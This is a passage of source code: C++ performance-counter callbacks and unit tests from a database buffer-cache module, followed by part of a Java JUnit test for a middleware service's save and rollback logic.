LONG LBFPagesPrereadCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesPreread.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPrereadStall;
LONG LBFPagePrereadStallsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPrereadStall.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesPrereadUnnecessary;
LONG LBFPagesPrereadUnnecessaryCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesPrereadUnnecessary.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesDehydrated;
LONG LBFPagesDehydratedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesDehydrated.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRehydrated;
LONG LBFPagesRehydratedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRehydrated.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesVersioned;
LONG LBFPagesVersionedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesVersioned.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesVersionCopied;
LONG LBFPagesVersionCopiedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesVersionCopied.PassTo( iInstance, pvBuf );
return 0;
}
LONG g_cBFVersioned;
LONG LBFVersionedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cBFVersioned;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRepeatedlyWritten;
LONG LBFPagesRepeatedlyWrittenCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRepeatedlyWritten.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCacheShrink;
LONG LBFPagesFlushedCacheShrinkCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCacheShrink.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCheckpoint;
LONG LBFPagesFlushedCheckpointCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCheckpoint.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCheckpointForeground;
LONG LBFPagesFlushedCheckpointForegroundCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCheckpointForeground.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedContextFlush; //needed for OSTrace
LONG LBFPagesFlushedContextFlushCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedContextFlush.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedFilthyForeground;
LONG LBFPagesFlushedFilthyForegroundCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedFilthyForeground.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedAvailPool;
LONG LBFPagesFlushedAvailPoolCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedAvailPool.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedScavengeSuperColdInternal;
LONG LBFPagesFlushedScavengeSuperColdInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedScavengeSuperColdInternal.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedScavengeSuperColdUser;
LONG LBFPagesFlushedScavengeSuperColdUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedScavengeSuperColdUser.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedOpportunely;
LONG LBFPagesFlushedOpportunelyCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedOpportunely.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedOpportunelyClean;
LONG LBFPagesFlushedOpportunelyCleanCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedOpportunelyClean.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesCoalescedWritten;
LONG LBFPagesCoalescedWrittenCEFLPv( LONG iInstance, void * pvBuf )
{
cBFPagesCoalescedWritten.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesCoalescedRead;
LONG LBFPagesCoalescedReadCEFLPv( LONG iInstance, void * pvBuf )
{
cBFPagesCoalescedRead.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFPageHistoryCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryRecord() : 0;
return 0;
}
LONG LBFPageHistoryHitsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryHit() : 0;
return 0;
}
LONG LBFPageHistoryReqsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryRequest() : 1;
return 0;
}
LONG LBFPageScannedOutOfOrderCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScannedOutOfOrder() : 0;
return 0;
}
LONG LBFPageScannedMovesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScannedMoves() : 0;
return 0;
}
LONG LBFPageScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScanned() : 1;
return 0;
}
LONG LRESMGRScanFoundEntriesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEnumeratedEntries() : 1;
return 0;
}
LONG LRESMGRScanBucketsScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanBucketsScanned() : 1;
return 0;
}
LONG LRESMGRScanEmptyBucketsScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEmptyBucketsScanned() : 1;
return 0;
}
LONG LRESMGRScanIdRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEnumeratedIDRange() : 1;
return 0;
}
LONG LRESMGRScanTimeRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.DtickLastScanEnumeratedRange() : 1;
return 0;
}
LONG LRESMGRCacheLifetimeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTarget(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeHWCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTargetHW(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstFoundNormal(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeEstVarCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTargetVar(), 0 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeK1CEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedTouchK1(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeK2CEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedTouchK2(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRScanFoundToEvictRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.DtickFoundToEvictDelta() : 0;
}
return 0;
}
LONG LRESMGRSuperColdedResourcesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdedResources() : 0;
}
return 0;
}
LONG LRESMGRSuperColdAttemptsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdAttempts() : 0;
}
return 0;
}
LONG LRESMGRSuperColdSuccessesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdSuccesses() : 0;
}
return 0;
}
LONG LBFResidentBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_cbfCacheResident : 0;
return 0;
}
LONG LBFMemoryEvictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_cacheram.CpgReclaim() + g_cacheram.CpgEvict() : 0;
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRepeatedlyRead;
LONG LBFPagesRepeatedlyReadCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRepeatedlyRead.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFOpportuneWriteIssuedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( ( ULONG* )pvBuf ) = cBFOpportuneWriteIssued;
return 0;
}
PERFInstanceDelayedTotal< LONG, INST, fFalse > cBFCheckpointMaintOutstandingIOMax;
LONG LCheckpointMaintOutstandingIOMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFCheckpointMaintOutstandingIOMax.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstanceLiveTotalWithClass<QWORD> cBFCacheMissLatencyTotalTicksAttached;
LONG LBFCacheMissLatencyTotalTicksAttachedCEFLPv( LONG iInstance, VOID * pvBuf )
{
cBFCacheMissLatencyTotalTicksAttached.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheMissLatencyTotalOperationsAttached;
LONG LBFCacheMissTotalAttachedCEFLPv( LONG iInstance, VOID * pvBuf )
{
cBFCacheMissLatencyTotalOperationsAttached.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheUnused;
LONG LBFCacheSizeUnusedCEFLPv( LONG iInstance, void* pvBuf )
{
// NOTE: we can use g_rgcbPageSize[g_icbCacheMax] here because unused pages are never dehydrated
if ( pvBuf )
*( (unsigned __int64*)pvBuf ) = ( (ULONG_PTR)cBFCacheUnused.Get( iInstance ) * g_rgcbPageSize[g_icbCacheMax] );
return 0;
}
#endif // PERFMON_SUPPORT
#ifdef ENABLE_JET_UNIT_TEST
// BFPriority Unit Testing
//
JETUNITTEST( BF, BFPriorityBasicResourcePriority )
{
CHECK( 0 == PctBFCachePri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1 == PctBFCachePri( BfpriBFMake( 1, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 10 == PctBFCachePri( BfpriBFMake( 10, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 100 == PctBFCachePri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1000 == PctBFCachePri( BfpriBFMake( 1000, (BFTEMPOSFILEQOS)0x0 ) ) );
// Bad values that assert in BfpriBFMake() - in ese.dll / ifndef ENABLE_JET_UNIT_TEST
CHECK( 1001 == PctBFCachePri( BfpriBFMake( 1001, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1023 == PctBFCachePri( BfpriBFMake( 1023, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 0 == PctBFCachePri( BfpriBFMake( 1024, (BFTEMPOSFILEQOS)0x0 ) ) ); // overflow
CHECK( 1023 == PctBFCachePri( BfpriBFMake( 0xFFFFFFFF, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 0xFFFFFFFF, (BFTEMPOSFILEQOS)0x0 ) ) ); // overflow shouldn't corrupt other values.
}
JETUNITTEST( BF, BFPriorityBasicIoDispatchPriority )
{
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0 ) ) );
CHECK( qosIODispatchBackground == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)qosIODispatchBackground ) ) );
CHECK( qosIODispatchImmediate == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)qosIODispatchImmediate ) ) );
// It's artificial to test with ResourcePriority = 0% above, so re-test with 100%.
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0 ) ) );
CHECK( qosIODispatchBackground == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)qosIODispatchBackground ) ) );
CHECK( qosIODispatchImmediate == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)qosIODispatchImmediate ) ) );
}
JETUNITTEST( BF, BFPriorityBasicUserTagPriority )
{
CHECK( 0x40000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x40000000 ) ) ); // Tag for Maintenance
CHECK( 0x01000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x01000000 ) ) ); // User Pri = 1
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x0F000000 ) ) ); // User Pri = 15
CHECK( 0x4F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x4F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
// Values that assert in BfpriBFMake() like they should in ese.dll / ifndef ENABLE_JET_UNIT_TEST
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x1F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x2F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
CHECK( 0x4F007F72 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0xFFFFFFFF ) ) ); // Full overflow, only misc bits should survive.
// It's artificial to test with ResourcePriority = 0% above, so re-test with 100%.
CHECK( 0x40000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x40000000 ) ) ); // Tag for Maintenance
CHECK( 0x01000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x01000000 ) ) ); // User Pri = 1
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x0F000000 ) ) ); // User Pri = 15
CHECK( 0x4F000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x4F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
}
JETUNITTEST( BF, BFPriorityMaxEdgeCases )
{
BFTEMPOSFILEQOS qosWorst = (BFTEMPOSFILEQOS)( 0x4F000000 | qosIODispatchMask | qosIOOSLowPriority );
wprintf( L"\n\t\t BfpriBFMake( 1000%%, qosWorst = 0x%I64x ) -> bfpri = 0x%x ( bfpriFaultIoPriorityMask = 0x%x ).\n",
(QWORD)qosWorst, BfpriBFMake( 1000, qosWorst ), bfpriFaultIoPriorityMask );
CHECK( 1000 == PctBFCachePri( BfpriBFMake( 1000, qosWorst ) ) );
CHECK( qosWorst == QosBFUserAndIoPri( BfpriBFMake( 1000, qosWorst ) ) );
}
// Atomic bit field unit tests.
//
JETUNITTEST( BF, AtomicBitFieldSet )
{
BF bf;
// Initially, all unset.
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FDependentPurged.
bf.bfbitfield.SetFDependentPurged( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFDependentPurged( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FImpedingCheckpoint.
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFImpedingCheckpoint( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FRangeLocked.
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFRangeLocked( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
}
JETUNITTEST( BF, AtomicBitFieldReset )
{
BF bf;
// Initially, all unset.
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set them all.
bf.bfbitfield.SetFDependentPurged( fTrue );
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FDependentPurged.
bf.bfbitfield.SetFDependentPurged( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFDependentPurged( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FImpedingCheckpoint.
bf.bfbitfield.SetFImpedingCheckpoint( fFalse );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FRangeLocked.
bf.bfbitfield.SetFRangeLocked( fFalse );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
}
#endif // ENABLE_JET_UNIT_TEST
| 464,914 |
419 |
<reponame>limasigor2/heimdall
package br.com.conductor.heimdall.core.service;
/*-
* =========================LICENSE_START==================================
* heimdall-core
* ========================================================================
* Copyright (C) 2018 Conductor Tecnologia SA
* ========================================================================
* Licensed under the Apache License, Version 2.0 (the "License")
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ==========================LICENSE_END===================================
*/
import br.com.conductor.heimdall.core.converter.GenericConverter;
import br.com.conductor.heimdall.core.dto.MiddlewareDTO;
import br.com.conductor.heimdall.core.dto.PageableDTO;
import br.com.conductor.heimdall.core.dto.page.MiddlewarePage;
import br.com.conductor.heimdall.core.entity.Api;
import br.com.conductor.heimdall.core.entity.Interceptor;
import br.com.conductor.heimdall.core.entity.Middleware;
import br.com.conductor.heimdall.core.enums.Status;
import br.com.conductor.heimdall.core.enums.TypeInterceptor;
import br.com.conductor.heimdall.core.environment.Property;
import br.com.conductor.heimdall.core.environment.Property.Middlewares;
import br.com.conductor.heimdall.core.exception.NotFoundException;
import br.com.conductor.heimdall.core.repository.ApiRepository;
import br.com.conductor.heimdall.core.repository.InterceptorRepository;
import br.com.conductor.heimdall.core.repository.MiddlewareRepository;
import br.com.conductor.heimdall.core.service.amqp.AMQPMiddlewareService;
import br.com.conductor.heimdall.core.util.Pageable;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import org.junit.runner.RunWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.runners.MockitoJUnitRunner;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.core.convert.converter.Converter;
import org.springframework.data.domain.Example;
import org.springframework.data.domain.Page;
import org.springframework.data.domain.Sort;
import org.springframework.mock.web.MockMultipartFile;
import java.io.IOException;
import java.time.LocalDateTime;
import java.time.Month;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import static org.junit.Assert.*;
@RunWith(MockitoJUnitRunner.class)
public class MiddlewareServiceTest {
@InjectMocks
private MiddlewareService service;
@Mock
private MiddlewareRepository middlewareRepository;
@Mock
private ApiRepository apiRepository;
@Mock
private InterceptorRepository interceptorRepository;
@Mock
private AMQPMiddlewareService amqpMiddlewareService;
@Mock
private Property property;
@Value("${zuul.filter.root}")
private String root;
@Rule
public ExpectedException thrown = ExpectedException.none();
private Api api;
private List<Middleware> middlewareList;
private List<Interceptor> interceptors = new ArrayList<>();
private Middleware m1, m2, m3, m4, m5, middleware;
private Middlewares middlewareProperty;
private MiddlewareDTO middlewareDTO;
private MockMultipartFile multipartFile;
@Before
public void setUp() throws Exception {
api = new Api();
api.setId(10L);
multipartFile = new MockMultipartFile("artifact", "strongbox-validate-8.1.jar",
"application/octet-stream", "some content".getBytes());
m1 = new Middleware();
m1.setStatus(Status.ACTIVE);
m1.setApi(api);
m1.setId(10L);
m1.setCreationDate(LocalDateTime.of(2017, Month.JULY, 29, 19, 30, 40));
m1.setFile(multipartFile.getBytes());
m2 = new Middleware();
m2.setStatus(Status.INACTIVE);
m2.setApi(api);
m2.setId(20L);
m2.setCreationDate(LocalDateTime.of(2016, Month.JULY, 29, 19, 30, 40));
m2.setFile(multipartFile.getBytes());
m3 = new Middleware();
m3.setStatus(Status.INACTIVE);
m3.setApi(api);
m3.setId(30L);
m3.setCreationDate(LocalDateTime.of(2015, Month.JULY, 29, 19, 30, 40));
m3.setFile(multipartFile.getBytes());
m4 = new Middleware();
m4.setStatus(Status.DEPRECATED);
m4.setApi(api);
m4.setId(40L);
m4.setCreationDate(LocalDateTime.of(2014, Month.JULY, 29, 19, 30, 40));
m4.setFile(multipartFile.getBytes());
m5 = new Middleware();
m5.setStatus(Status.DEPRECATED);
m5.setApi(api);
m5.setId(50L);
m5.setCreationDate(LocalDateTime.of(2013, Month.JULY, 29, 19, 30, 40));
m5.setFile(multipartFile.getBytes());
middlewareList = new ArrayList<>();
middlewareList.add(m1);
middlewareList.add(m2);
middlewareList.add(m3);
middlewareList.add(m4);
middlewareList.add(m5);
Property p = new Property();
middlewareProperty = p.getMiddlewares();
middlewareDTO = new MiddlewareDTO();
middlewareDTO.setStatus(Status.ACTIVE);
middlewareDTO.setVersion("0.0.1");
middleware = GenericConverter.mapper(middlewareDTO, Middleware.class);
middleware.setApi(api);
middleware.setPath(root + "/api/" + api.getId() + "/middleware");
middleware.setType("jar");
middleware.setStatus(Status.ACTIVE);
try {
middleware.setFile(multipartFile.getBytes());
} catch (IOException e) {
e.printStackTrace();
}
Mockito.when(middlewareRepository.findByApiId(api.getId())).thenReturn(middlewareList);
Mockito.when(apiRepository.findOne(api.getId())).thenReturn(api);
Mockito.when(interceptorRepository.findByTypeAndOperationResourceApiId(TypeInterceptor.MIDDLEWARE, api.getId()))
.thenReturn(interceptors);
Mockito.when(property.getMiddlewares()).thenReturn(middlewareProperty);
Mockito.when(middlewareRepository.save(middleware)).thenReturn(middleware);
Mockito.when(middlewareRepository.save(middlewareList)).thenReturn(middlewareList);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m1.getId())).thenReturn(m1);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m2.getId())).thenReturn(m2);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m3.getId())).thenReturn(m3);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m4.getId())).thenReturn(m4);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m5.getId())).thenReturn(m5);
}
@Test
public void saveNewMiddlewareTest() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertNull(middlewareMap.get(Status.DEPRECATED));
}
@Test
public void propertyNotSetTest() {
middlewareProperty.setAllowInactive(null);
middlewareProperty.setDeleteDeprecated(null);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(3, middlewareMap.get(Status.INACTIVE).size());
assertEquals(2, middlewareMap.get(Status.DEPRECATED).size());
}
@Test
public void saveNewMiddlewareHugeRollbackTest() {
middlewareProperty.setAllowInactive(99999999);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(m -> m.getStatus()));
assertTrue(saved.equals(middleware));
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(3, middlewareMap.get(Status.INACTIVE).size());
assertEquals(2, middlewareMap.get(Status.DEPRECATED).size());
}
@Test
public void doNotDeleteDeprecated() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(false);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertEquals(4, middlewareMap.get(Status.DEPRECATED).size());
assertNotNull(m2.getFile());
assertNotNull(m3.getFile());
assertNotNull(m4.getFile());
assertNotNull(m5.getFile());
}
@Test
public void deleteDeprecated() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertNull(middlewareMap.get(Status.DEPRECATED));
}
@Test
public void noMiddlewareTest() {
Mockito.when(middlewareRepository.findByApiId(api.getId())).thenReturn(null);
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
assertTrue(saved.equals(middleware));
}
@Test
public void findTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(m1);
Middleware middleware = service.find(1L, 1L);
